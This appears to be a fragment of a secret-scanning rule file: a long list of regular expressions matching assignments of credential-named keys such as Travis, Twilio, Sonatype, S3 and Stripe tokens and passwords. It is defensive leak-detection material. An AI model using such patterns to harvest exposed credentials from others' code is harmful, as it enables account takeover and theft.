- - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?2[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?widget[_-]?basic[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?watson[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?watson[_-]?device[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?watson[_-]?conversation[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?wakatime[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?vscetoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?visual[_-]?recognition[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?virustotal[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?vip[_-]?github[_-]?deploy[_-]?key[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?vip[_-]?github[_-]?deploy[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?vip[_-]?github[_-]?build[_-]?repo[_-]?deploy[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?v[_-]?sfdc[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?v[_-]?sfdc[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?usertravis[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?user[_-]?assets[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?user[_-]?assets[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?use[_-]?ssh[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?us[_-]?east[_-]?1[_-]?elb[_-]?amazonaws[_-]?com[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?urban[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?urban[_-]?master[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?urban[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?unity[_-]?serial[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?unity[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?twitteroauthaccesstoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?twitteroauthaccesssecret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?twitter[_-]?consumer[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?twitter[_-]?consumer[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?twine[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?twilio[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?twilio[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?twilio[_-]?configuration[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?twilio[_-]?chat[_-]?account[_-]?api[_-]?service[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?twilio[_-]?api[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?twilio[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?trex[_-]?okta[_-]?client[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?trex[_-]?client[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?travis[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?travis[_-]?secure[_-]?env[_-]?vars[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?travis[_-]?pull[_-]?request[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?travis[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?travis[_-]?e2e[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?travis[_-]?com[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?travis[_-]?branch[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?travis[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?travis[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?token[_-]?core[_-]?java[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?thera[_-]?oss[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?tester[_-]?keys[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?test[_-]?test[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?test[_-]?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?tesco[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?svn[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?surge[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?surge[_-]?login[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?stripe[_-]?public[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?stripe[_-]?private[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?strip[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?strip[_-]?publishable[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?stormpath[_-]?api[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?stormpath[_-]?api[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?starship[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?starship[_-]?account[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?star[_-]?test[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?star[_-]?test[_-]?location[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?star[_-]?test[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?star[_-]?test[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?staging[_-]?base[_-]?url[_-]?runscope[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ssmtp[_-]?config[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sshpass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?srcclr[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?square[_-]?reader[_-]?sdk[_-]?repository[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sqssecretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sqsaccesskey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?spring[_-]?mail[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?spotify[_-]?api[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?spotify[_-]?api[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?spaces[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?spaces[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?soundcloud[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?soundcloud[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sonatypepassword[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sonatype[_-]?token[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sonatype[_-]?token[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sonatype[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sonatype[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sonatype[_-]?nexus[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sonatype[_-]?gpg[_-]?passphrase[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sonatype[_-]?gpg[_-]?key[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sonar[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sonar[_-]?project[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sonar[_-]?organization[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?socrata[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?socrata[_-]?app[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?snyk[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?snyk[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?snoowrap[_-]?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?snoowrap[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?snoowrap[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?slate[_-]?user[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?slash[_-]?developer[_-]?space[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?slash[_-]?developer[_-]?space[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?signing[_-]?key[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?signing[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?signing[_-]?key[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?signing[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?setsecretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?setdstsecretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?setdstaccesskey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ses[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ses[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?service[_-]?account[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sentry[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sentry[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sentry[_-]?endpoint[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sentry[_-]?default[_-]?org[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sentry[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sendwithus[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sendgrid[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sendgrid[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sendgrid[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sendgrid[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sendgrid[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sendgrid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?selion[_-]?selenium[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?selion[_-]?log[_-]?level[_-]?dev[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?segment[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?secretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?secretaccesskey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?secret[_-]?key[_-]?base[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?secret[_-]?9[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?secret[_-]?8[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?secret[_-]?7[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?secret[_-]?6[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?secret[_-]?5[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?secret[_-]?4[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?secret[_-]?3[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?secret[_-]?2[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?secret[_-]?11[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?secret[_-]?10[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?secret[_-]?1[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?secret[_-]?0[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sdr[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?scrutinizer[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sauce[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sandbox[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sandbox[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sandbox[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?salesforce[_-]?bulk[_-]?test[_-]?security[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?salesforce[_-]?bulk[_-]?test[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sacloud[_-]?api[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sacloud[_-]?access[_-]?token[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?sacloud[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?s3[_-]?user[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?s3[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?s3[_-]?secret[_-]?assets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?s3[_-]?secret[_-]?app[_-]?logs[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?s3[_-]?key[_-]?assets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?s3[_-]?key[_-]?app[_-]?logs[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?s3[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?s3[_-]?external[_-]?3[_-]?amazonaws[_-]?com[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?s3[_-]?bucket[_-]?name[_-]?assets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?s3[_-]?bucket[_-]?name[_-]?app[_-]?logs[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?s3[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?s3[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?rubygems[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?rtd[_-]?store[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?rtd[_-]?key[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?route53[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ropsten[_-]?private[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?rinkeby[_-]?private[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?rest[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?repotoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?reporting[_-]?webdav[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?reporting[_-]?webdav[_-]?pwd[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?release[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?release[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?registry[_-]?secure[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?registry[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?rediscloud[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?redis[_-]?stunnel[_-]?urls[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?randrmusicapiaccesstoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?rabbitmq[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?quip[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?qiita[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?pypi[_-]?passowrd[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?pushover[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?publish[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?publish[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?publish[_-]?access[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?project[_-]?config[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?prod[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?prod[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?prod[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?private[_-]?signing[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?pring[_-]?mail[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?preferred[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
